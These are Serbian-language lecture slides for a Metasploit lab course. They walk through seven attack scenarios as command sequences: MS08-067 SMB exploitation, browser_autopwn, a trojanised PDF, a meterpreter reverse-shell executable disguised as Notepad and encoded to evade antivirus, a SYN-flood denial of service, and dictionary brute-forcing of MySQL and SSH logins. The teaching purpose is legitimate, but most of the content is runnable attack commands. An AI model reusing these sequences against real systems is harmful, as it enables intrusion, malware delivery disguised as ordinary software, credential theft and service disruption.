Metasploit napadi Napad na MySQL, SSH, FTP Armitage (Metasploit GUI)
Dušan Stamenković, M.Sc.
Beograd, 2013.
Metasploit Tipovi napada koje ćemo proći na vežbama: •Napad preko SMB •Napad preko Browser-a •Napad preko aktivnog PDF fajla •Napad preko Notepad.exe fajla •Napad na web server (DOS) •Napad na MySQL •Napad na SSH •Napad na FTP
Metasploit Pojavio se 2003 izdat od strane HD Moorea Osnove: •BSD Licenca •700.000 linija Ruby koda •Trenutno održava Rapid 7 (*naplaćuje PRO verziju) De facto standard in vulnerability development framework: •Komercijalne alternetive •Rapid 7 komercijalne alternetive •CANVAS http://www.eweek.com/c/a/Security/The-15-Most-Influential-People-in-Security-Today/10/
Metasploit Metasploit je poznat po anti-forenzičkom pristupu i teškoj detekciji: • Modularan i lak za kombinovanje i razvoj novih modula, lako prenosiv msfupdate • Ažuriranje definicija modula msfconsole • Pokretanje MSF konzole, CMD interfejs • Automatizacija Exploita
Metasploit Update Komande za ažuriranje verzije framework-a i novih verzija metasploit-a: • • • • • •
apt-get purge metasploit rm -rf /opt/metasploit apt-get update apt-get install metasploit cd /opt/metasploit/msf3 msfconsole
Scenario 1: Napad u lokalnoj mreži (SMB) Uspešan napad podrazumeva sledeće uslove: • • • •
Napadač i klijent se nalaze u istoj lokalnoj računarskoj mreži Napadač je prikupio dovoljno podataka o potencijalnoj žrtvi Žrtva nema pravilno ažuriran sistem, konfigurisan Firewall, AV, IDS/IPS Na osnovu podatak koje je prikupio napadač je pronašao odgovarajući način da iskoristi manu sistema koji planira da napadne • U demonstraciji koristiće se greška na NetAPI32.dll kroz Server Service (MS08_067_netapi), greška je prisutna u Microsoft Windows XP i Server 2003 operativnim sistemima
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
Scenario 1: Napad u lokalnoj mreži (SMB)
Scenario 1: Napad u lokalnoj mreži (SMB) Komande koje se koriste pri napadu: • • • • • • •
msfconsole use exploit/windows/smb/ms08_067_netapi show options set RHOST 192.168.51.49 (*IP adresa žrtve) exploit shell http://www.microsoft.com/resources/documentation/windows/xp/all /proddocs/en-us/net_user.mspx?mfr=true
Opciono: • • • •
set PAYLOAD windows/meterpreter/reverse_tcp show options set LHOST 192.168.51.48 (*IP adresa napadača) exploit
Scenario 2: Napad spolja, iza NATa, napad na internet pretraživač Uspešan napad podrazumeva sledeće uslove: • Napadač i klijent se ne moraju nalaziti u istoj lokalnoj računarskoj mreži, zapravo mogu biti bilo gde, sama konfiguracija podrazumeva napadačevo znanje o funkcionisanju računarskih mreža • Napadač je prikupio dovoljno podataka o potencijalnoj žrtvi • Žrtva nema pravilno ažuriran sistem, konfigurisan Firewall, AV, IDS/IPS Alat koji se koristi pri napadu: • Browser Autopwn za MSF
http://www.metasploit.com/modules/auxiliary/server/browser_autopwn
Scenario 2: Napad spolja, iza NATa, napad na internet pretraživač
Scenario 2: Napad spolja, iza NATa, napad na internet pretraživač Komande koje se koriste pri napadu: • msfconsole • use auxiliary/server/browser_autopwn • show options • set LHOST 192.168.51.48 (*IP adresa napadača) • set URIPATH / • set SRVPORT 80 • run • sessions -i 1 • getuid • ps • kill 2720... • exit
Scenario 3: Napad spolja, putem neažurne verzije aplikacije, primer PDF Uspešan napad podrazumeva sledeće uslove: • Napadač i klijent se ne moraju nalaziti u istoj lokalnoj računarskoj mreži, zapravo mogu biti bilo gde, sama konfiguracija podrazumeva napadačevo znanje o funkcionisanju računarskih mreža • Napadač ne mora imati sve informacije o žrtvi, dovoljne su informacije o verziji aplikacije za koju se napad priprema • Žrtva nema pravilno ažuriran AV sistem Alat koji se koristi pri napadu: • Adobe PDF Embedded EXE Social Engineering http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe
Scenario 3: Napad spolja, putem neažurne verzije aplikacije, primer PDF
Scenario 3: Napad spolja, putem neažurne verzije aplikacije, primer PDF Komande koje se koriste pri napadu: • • • • • • • • • • • • • • • • • • • • •
msfconsole search pdf use exploit/windows/fileformat/adobe_pdf_embedded_exe show options set INFILENAME /root/primer.pdf set PAYLOAD windows/meterpreter/reverse_tcp show options set LHOST 192.168.51.2 (*IP adresa napadača) exploit cp /root/.msf4/local/evil.pdf /var/www/downloads/ use exploit/multi/handler show options set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.51.2 (*IP adresa napadača) exploit sessions -i 1 getuid ps kill 2720... migrate 1992 exit
Scenario 4: Napad spolja putem namenske aplikacije Uspešan napad podrazumeva sledeće uslove: • Napadač i klijent se ne moraju nalaziti u istoj lokalnoj računarskoj mreži, zapravo mogu biti bilo gde, sama konfiguracija podrazumeva napadačevo znanje o funkcionisanju računarskih mreža • Napadač ne mora imati informacije o žrtvi, dovoljno je da nekim od alata ubedi potencijalnu žrtvu da preuzme i pokrene namensku aplikaciju • Žrtva nema pravilno ažuriran AV, IDS/IPS sistem Alat koji se koristi pri napadu: • Windows Meterpreter, Reverse TCP http://www.metasploit.com/search.jsp?cx=009245545489775321519%3Azlrrcrpwkkq&cof=FO RID%3A10%3BNB%3A1&ie=UTF-8&q=Windows+Meterpreter%2C+Reverse+TCP&sa=
Scenario 4: Napad spolja putem namenske aplikacije
Scenario 4: Napad spolja putem namenske aplikacije Komande koje se koriste pri napadu: • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.51.48 X > MeterpreterReverseTcp.exe • cp MeterpreterReverseTcp.exe /var/www/downloads/ • msfconsole • use exploit/multi/handler • set PAYLOAD windows/meterpreter/reverse_tcp • set LHOST 192.168.51.48 (*IP adresa napadača) • exploit • sessions -i 1 Dodatne komande koje se koriste pri skrivanju programa • getuid namenjenog za napad: • ps • msfencode -h • ls • msfencode -l • exit • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.51.48 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o Notepad2.exe -x /root/NOTEPAD.EXE -k • cp Notepad2.exe /var/www/downloads/
Scenario 5: DOS napada na WEB server Priprema napada: • use scanner/portscan/syn • set RHOSTS • set PORTS Komande koje se koriste pri napadu: • • • • • • •
msfconsole use auxiliary/dos/tcp/synflood show options set RHOST 192.168.100.112 (*IP adresa WEB servera koji napadamo) set RPORT 80 (*HTTP port) set SHOST 192.168.100.100 (*IP adresa nekog računara u mreži sa kojeg dolaze lažni zahtevi) run
Scenario 5: DOS napada na WEB server
Scenario 6: Napada na MySQL server remote konekciju putem rečnika Priprema napada: •use scanner/portscan/syn •set RHOSTS •set PORTS Komande koje se koriste pri napadu: •msfconsole •use auxiliary/scanner/mysql/mysql_login •show options •set RHOST 192.168.100.112 (*IP adresa MySQL servera koji napadamo) •set PASS_FILE /root/Desktop/MySQL_SSH.txt (*Rečnik) •set USERNAME zrm (*Korisničko ime za koje pokušavamo da pronađemo lozinku) •run
Scenario 6: Napada na MySQL server remote konekciju putem rečnika
Scenario 7: Napada na SSH server remote konekciju putem rečnika Priprema napada: •use scanner/portscan/syn •set RHOSTS •set PORTS Komande koje se koriste pri napadu: •msfconsole •use auxiliary/scanner/ssh/ssh_login •show options •set RHOST 192.168.100.112 (*IP adresa MySQL servera koji napadamo) •set PASS_FILE /root/Desktop/MySQL_SSH.txt (*Rečnik) •set USERNAME root (*Korisničko ime za koje pokušavamo da pronađemo lozinku) •run
Scenario 7: Napada na SSH server remote konekciju putem rečnika
Armitage (Metasploit) GUI Možemo skenirati mrežu radi pronalaženja potencijalnih žrtvi i njihovih slabosti. Kroz grafički interfejs su nam dostupni svi metasploit alati (imamo na rasploaganju i CLI)